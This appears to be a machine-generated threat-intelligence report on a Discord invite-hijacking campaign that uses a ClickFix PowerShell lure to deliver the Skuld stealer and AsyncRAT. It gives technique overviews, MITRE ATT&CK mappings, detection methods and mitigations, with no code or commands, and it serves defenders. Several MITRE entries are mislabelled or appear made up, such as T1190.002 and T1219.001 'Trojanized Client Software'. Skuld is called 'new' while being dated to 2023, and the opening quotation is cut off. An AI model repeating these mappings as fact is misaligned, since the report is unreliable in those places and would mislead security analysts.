Full Report
A new malware campaign is exploiting a weakness in Discord's invitation system to deliver an information stealer called Skuld and the AsyncRAT remote access trojan. "Attackers hijacked the links through vanity link registration, allowing them to silently redirect users from trusted sources to malicious servers," Check Point said in a technical report. "The attackers combined the ClickFix
Analysis Summary
# Tool/Technique: Skuld Stealer
## Overview
Skuld is a new information stealer, written in Go (Golang), designed to harvest sensitive user data, particularly targeting cryptocurrency wallet credentials and seed phrases from various applications.
## Technical Details
- Type: Malware family (Information Stealer)
- Platform: Windows (Implied, as it interacts with Windows processes and PowerShell)
- Capabilities: Steals data from Discord, browsers, crypto wallets (Exodus, Atomic), harvests seed phrases, uses wallet injection, and communicates via Discord webhooks.
- First Seen: Mentioned in a June 2023 context (based on the linked article date, though the campaign context is recent).
## MITRE ATT&CK Mapping
- T1555 - Credentials from Files
- T1555.003 - Credentials from Password Stores
- T1056 - Input Capture
- T1056.001 - Keylogging
- T1003 - OS Credential Dumping
- T1003.001 - LSASS Memory
## Functionality
### Core Capabilities
- Steals sensitive user data from Discord, various web browsers, and gaming platforms.
- Specifically targets and harvests crypto wallet information, including seed phrases and passwords from Exodus and Atomic wallets.
- Data exfiltration is conducted via Discord webhooks.
### Advanced Features
- **Wallet Injection:** A technique that replaces legitimate application files with trojanized versions downloaded from GitHub to facilitate credential theft.
- Leverages custom version of ChromeKatz to bypass Chrome's app-bound encryption protections.
- Payload delivery utilizes trusted cloud services (Bitbucket, Pastebin) to maintain stealth.
## Indicators of Compromise
- File Hashes: [Not specified in the text]
- File Names: [Not specified in the text]
- Registry Keys: [Not specified in the text]
- Network Indicators: Data exfiltrated via **Discord webhooks**. Downloaded payloads sourced from **Bitbucket** and **Pastebin**.
- Behavioral Indicators: Execution of a PowerShell script retrieved from Pastebin following clipboard manipulation. File replacement tactics indicative of wallet injection.
## Associated Threat Actors
- Threat actor responsible for the Discord invitation hijacking campaign (Specific group name not mentioned, but associated with the use of AsyncRAT).
## Detection Methods
- Signature-based detection: Signatures tuned against the Go binary structure or known C2 traffic patterns (Discord webhooks).
- Behavioral detection: Monitoring for unusual file replacement operations targeting crypto wallet application files (wallet injection).
- YARA rules if available: Yara rules targeting Go binaries with known compilation properties related to Skuld.
## Mitigation Strategies
- Users should be wary of unknown or unexpected Discord invitation links, even if they appear to come from trusted sources.
- Implement strict controls on running PowerShell scripts initiated via unintended user input (e.g., pasted content from the clipboard).
- Security software should monitor processes interacting with cryptocurrency wallet directories for file modification/replacement.
- Disable or restrict the ability to run non-standard executables or scripts obtained from untrusted automation workflows.
## Related Tools/Techniques
- AsyncRAT (Used in conjunction as the RAT payload).
- ClickFix (Social engineering technique used to trick users into executing the initial PowerShell command).
- ChromeKatz (Custom version used to bypass Chrome encryption).
- Wallet Injection (Technique used by Skuld against crypto wallets).
***
# Tool/Technique: AsyncRAT
## Overview
AsyncRAT is a Remote Access Trojan (RAT) used in this campaign to gain comprehensive remote control over the infected systems.
## Technical Details
- Type: Malware family (Remote Access Trojan)
- Platform: Windows (Implied by PowerShell usage, cross-platform capabilities possible)
- Capabilities: Comprehensive remote control, uses a dead drop resolver for C2 communication, deployed via multi-stage loader.
- First Seen: [Not specified in the text for this specific deployment]
## MITRE ATT&CK Mapping
- T1219 - Remote Access Software
- T1219.001 - Trojanized Client Software
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols
## Functionality
### Core Capabilities
- Provides threat actors with full remote control over compromised machines.
- Deployed following the execution of a multi-stage infection chain initiated via Discord interaction.
- Communication with C2 infrastructure is obfuscated.
### Advanced Features
- **Dead Drop Resolver:** Employs this technique to read C2 server details from a file hosted on Pastebin, adding a layer of indirection to C2 discovery.
## Indicators of Compromise
- File Hashes: [Not specified in the text]
- File Names: [Not specified in the text]
- Registry Keys: [Not specified in the text]
- Network Indicators: C2 communication initiated after resolving location from **Pastebin**.
- Behavioral Indicators: Communication patterns consistent with known RAT functionality (e.g., initial check-in after execution).
## Associated Threat Actors
- Threat actor responsible for the Discord invitation hijacking campaign.
## Detection Methods
- Signature-based detection: Known AsyncRAT signatures.
- Behavioral detection: Detecting outbound connections to uncharacteristic IP addresses or domains after an initial script execution, especially those using Pastebin as a C2 resolver.
- YARA rules if available: [Not specified in the text]
## Mitigation Strategies
- Block connections to known C2 domains/IPs associated with AsyncRAT infrastructure.
- Monitor for processes executing commands downloaded from potentially suspicious sources like Pastebin.
- Ensure network segmentation limits the lateral movement capability of a compromised RAT.
## Related Tools/Techniques
- Skuld Stealer (Delivered alongside AsyncRAT).
***
# Technique: Discord Invitation Link Hijacking (Vanity Link Abuse)
## Overview
Attackers exploit a vulnerability or feature in Discord's vanity invite link system, allowing them to reuse expired or deleted unique invite codes to create legitimate-looking links that redirect users to malicious Discord servers.
## Technical Details
- Type: Technique (Initial Access/Delivery Vector)
- Platform: Discord (Social Media Platform)
- Capabilities: Establishing initial access by leveraging expired trust associated with previously used invite links.
- First Seen: Campaign evidence surfaced recently, exploiting the specific mechanism of vanity link reuse.
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.002 - Spearphishing Link
- T1190 - Exploit Public-Facing Application
- T1190.002 - Exploit of Web Application Vulnerabilities (Abuse of invite logic)
## Functionality
### Core Capabilities
- Claiming vanity invite codes associated with legitimate, now-defunct servers.
- Silently redirecting users following legacy links to attacker-controlled Discord servers.
### Advanced Features
- **Multi-Stage Delivery:** Used specifically to deliver the infection chain involving Skuld and AsyncRAT.
- **Trust Leveraging:** The technique relies on the inherent trust users place in links previously shared on reputable forums or websites.
## Indicators of Compromise
- File Hashes: [N/A – This is a delivery vector]
- File Names: [N/A]
- Registry Keys: [N/A]
- Network Indicators: Links directing users to Discord servers controlled by the attackers after the initial link redirection.
- Behavioral Indicators: Users joining an unexpected or suspicious Discord server via an expected invite link.
## Associated Threat Actors
- Threat actor utilizing Skuld and AsyncRAT in this campaign.
## Detection Methods
- Signature-based detection: [Not applicable for link inspection alone]
- Behavioral detection: Monitoring for sudden spikes in users joining servers via compromised vanity links. Auditing for invite code reuse attempts on the Discord platform (if external monitoring is possible).
- YARA rules if available: [N/A]
## Mitigation Strategies
- Discord platform changes to prevent the re-registration of expired/deleted permanent vanity codes.
- Users should verify the domain/server reputation before joining any Discord server, regardless of the preceding link's source.
- Security teams should maintain awareness of ongoing invite link abuse techniques.
## Related Tools/Techniques
- ClickFix (Used after joining the server for lateral execution).
***
# Technique: ClickFix Social Engineering Tactic
## Overview
A social engineering technique used within the malicious Discord server. Victims are convinced to execute a command line string (a PowerShell command) supposedly for verification purposes, which actually initiates the multi-stage malware download.
## Technical Details
- Type: Technique (Social Engineering/Execution Facilitation)
- Platform: Windows (Requires execution via Windows Run dialog)
- Capabilities: Tricking users into pasting and running a PowerShell command copied to their clipboard.
- First Seen: Social engineering described in the context of previous campaigns (e.g., Atomic macOS stealer).
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (By proxy of initiating payload execution)
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
## Functionality
### Core Capabilities
- The "Verify" button executes JavaScript that copies a PowerShell command to the user's clipboard.
- Users are manually directed to open the Run dialog (Win+R), paste the content, and execute it, thus bypassing potential automatic execution blocks.
### Advanced Features
- Leveraging the perceived necessity of "verification" to coerce higher user interaction and bypass standard browser protections.
## Indicators of Compromise
- File Hashes: [N/A]
- File Names: [N/A]
- Registry Keys: [N/A]
- Network Indicators: Initial download execution triggered by a PowerShell script sourced from **Pastebin**.
- Behavioral Indicators: Clipboard manipulation followed immediately by invocation of `powershell.exe` or execution via `cmd.exe`/Run dialog.
## Associated Threat Actors
- Threat actor utilizing Skuld and AsyncRAT, linked to previous uses of ClickFix.
## Detection Methods
- Signature-based detection: PowerShell command strings associated with this specific delivery method.
- Behavioral detection: Monitoring for processes initiating PowerShell execution after clipboard content suggests automation or copy/paste execution.
- YARA rules if available: [N/A]
## Mitigation Strategies
- Educate users to never copy and paste commands from untrusted sources into the Run dialog or command line.
- Implement application whitelisting or constraints on PowerShell execution, especially when launched outside of standard user workflows.
## Related Tools/Techniques
- PowerShell (The interpreter used for initial payload retrieval).
- Discord Bot Authorization (Used as pretext for verification step).